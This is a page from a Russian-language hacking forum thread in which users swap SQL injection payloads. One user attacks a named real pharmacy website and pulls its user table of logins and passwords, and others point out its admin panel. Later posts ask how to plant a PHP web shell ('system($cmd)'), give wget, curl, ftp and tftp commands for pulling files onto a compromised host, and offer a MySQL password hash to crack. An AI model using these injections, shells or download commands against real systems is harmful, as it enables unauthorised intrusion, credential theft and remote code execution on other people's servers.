FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 133 из 2422

133

Опции темы

Поиск в этой теме

Опции просмотра

22.03.2008, 18:24

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

Отправить сообщение для Scipio с помощью ICQ

попробуй без limit:
id=1'union+select+1,2,3,4,5,table_schema,6,8,9,10, 11,12+FROM+INFORMATION_SCHEMA.tables+WHER E+TABLE_NAME='phpbb_users'/*

__________________
Карфаген должен быть разрушен...

22.03.2008, 18:29

~~Timati~~

Banned

Регистрация: 17.03.2008

Сообщений: 22

Провел на форуме:
140962

Репутация: 5

Попробуй так :

PHP код:


		
			
<?Govyuazhiy huy

"Ebitnya";

?HUY>

22.03.2008, 18:37

Dimi4

Reservists Of Antichat - Level 6

Регистрация: 19.03.2007

Сообщений: 953

Провел на форуме:
7617458

Репутация: 3965

Отправить сообщение для Dimi4 с помощью ICQ

Обошол!(/*)
Спасибо всем кто помог, всем +5

__________________

BlackHat.

MoDL

Последний раз редактировалось Dimi4; 22.03.2008 в 18:47..

22.03.2008, 22:25

samarin

Участник форума

Регистрация: 24.02.2008

Сообщений: 136

Провел на форуме:
295283

Репутация: 69

Отправить сообщение для samarin с помощью ICQ

Нашел скулю
--------------------------
Сеть аптечных магазинов!
Цитата:http://www.zdorovie-plus.com/catalog/index.php?g=553+union+select+1,2,3,4,5/*#s576

5.0.22-log
zdplus@localhost
---------------------------------
information_schema.tables
Цитата:http://www.zdorovie-plus.com/catalog/index.php?g=553+union+select+1,2,3,table_name,5+fr om+information_schema.tables/*#s576
----------------------------------
вывожу колонки? например с zdp_usr

Цитата:

http://www.zdorovie-plus.com/catalog/index.php?g=553+union+select+1,2,3,column_name,5+f rom+information_schema.columns+where+table_name+li ke+`zdp_usr`/*#s576

получаю

Цитата:

id
usr
pwd
type

как я понял экранирования кавычек нет
------------------------------------
но при попытке вывода колонок выплевует
звездочки-заместо текста и ошибку

Цитата:

Не могу получить перечень оборудования! The used SELECT statements have a different number of columns

------------------------------------
рас уж кавычки не фильтруются, значит как то можно залить шелл
я шеллы еще не заливал-буду рад примеру
------------------------------------

Последний раз редактировалось samarin; 22.03.2008 в 22:33..

22.03.2008, 22:57

Jokester

Познавший АНТИЧАТ

Регистрация: 18.02.2008

Сообщений: 1,136

Провел на форуме:
17621293

Репутация: 4915

Звёздочки это аккаунт,вот админка
_http://www.zdorovie-plus.com/adm/login.php

З.Ы.Т.е. логин 5 звёздочек и пароль 5 звездочек

А шелл врятли, прав не хватит, если через скуль,а в админке я не лазил можешь посмотреть

Последний раз редактировалось jokester; 22.03.2008 в 23:17.. Причина: дополнение

22.03.2008, 23:13

samarin

Участник форума

Регистрация: 24.02.2008

Сообщений: 136

Провел на форуме:
295283

Репутация: 69

по поводу аккаунта спасибо-сам бы не догадался, что звездочки-это вовсе не звездочки
а по поводу админки я уже нашел на http://madnet.name/tools/madss/
-------------------------------
а как насчет шелла?
-------------------------------
хотелось бы сделать копию сайта-для экспериментов на локалхосте(или взять где-то любую другую копию более менее "серьезного"сайта)
--------------------------------
в админке был-мне это ничего не дало
Я ж говорю: шеллы никогда еще не заливал, прошу помощи, потому что на примере учиться легче и понятней, чем на голой теории

Последний раз редактировалось samarin; 22.03.2008 в 23:34..

23.03.2008, 13:25

Spaise

Познающий

Регистрация: 21.03.2008

Сообщений: 39

Провел на форуме:
99208

Репутация: 21

Подскажите пожалуйста, как можно залить php шелл, на подобии r57shell, через залитый через инжекцию файл с содержанием -

Цитата:

<?php system($cmd); ?>

Последний раз редактировалось Spaise; 23.03.2008 в 13:27..

23.03.2008, 13:32

Dima-k17

Познающий

Регистрация: 15.09.2005

Сообщений: 60

Провел на форуме:
254802

Репутация: 52

Отправить сообщение для Dima-k17 с помощью ICQ

Цитата:

Сообщение от Spaise

Про команды в ОС почитать видимо религия не позволяет?:-)
Если *nix то так:
wget -o [что] [куда]
Если вин, то проще наверное с фтп скачать, хотя могу ошибаться.

23.03.2008, 17:33

+toxa+

[Лишённый самовыражени

Регистрация: 16.01.2005

Сообщений: 1,787

Провел на форуме:
9751379

Репутация: 3812

Отправить сообщение для +toxa+ с помощью ICQ

Отправить сообщение для +toxa+ с помощью AIM

Цитата:

Сообщение от Spaise

Цитата:

В unix системах (linux,*bsd,sunos) для скачивания файлов обычно используются качалки, всего их 5:
- wget
- curl
- fetch
- lynx
- links

Определить существует ли данная качалка можно командой which
[user@host] ~/tmp$ which wget
/usr/local/bin/wget

Пусть требуется скачать file.c с сайта site.ru в папку /tmp

- wget -o /tmp/file.c http://site.ru/file.c
- curl -o /tmp/file.c http://site.ru/file.c
- fetch -o /tmp/file.c http://site.ru/file.c
- lynx -source "http://site.ru/file.c" > /tmp/file.c
- links -source "http://site.ru/file.c" > /tmp/file.c
- GET http://site.ru/file.c > /tmp/file.c

Бывает что не одной из перечисленных качалок нет или не хватает прав для запуска

Тогда мы можем воспользоваться ftp =)
echo user password > /tmp/ftp
echo type binary >> /tmp/ftp
echo lcd /tmp >> /tmp/ftp
echo get file.c file.c >> /tmp/ftp
echo quit >> /tmp/ftp
ftp -n site.ru < /tmp/ftp

Win.
В форточках существует 2 вида скачивания файла:
- ftp
- tftp

Пусть требуется скачать file.exe с сайта ftp.site.ru
Сделаем это с помощь ftp сценария:

echo login > ftp.tmp
echo password >> ftp.tmp
echo get file.exe file.exe >> ftp.tmp
ftp -s:ftp.tmp ftp.site.ru

Tftp сервис является упрощённым ftp
Скачать сам сервер можно с офф сайта http://tftpd32.jounin.net
Скачивается файл командой:
tftp -i tftp_server_ip get file.exe

(с)

2 mff
6cb1963d2018c3ea - mysql хэш. Перебирать через PasswordsPro

__________________

Спасибо!

#10

23.03.2008, 17:36

mff

Познавший АНТИЧАТ

Регистрация: 12.03.2008

Сообщений: 1,379

Провел на форуме:
5866479

Репутация: 1809

Отправить сообщение для mff с помощью ICQ

Спасибо!

Цитата:

Сообщение от +toxa+

(с)

2 mff
6cb1963d2018c3ea - mysql хэш. Перебирать через PasswordsPro

Спасибо! Эту програмку я давно знаю!

Страница 133 из 2422

133

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

ANTICHAT.XYZ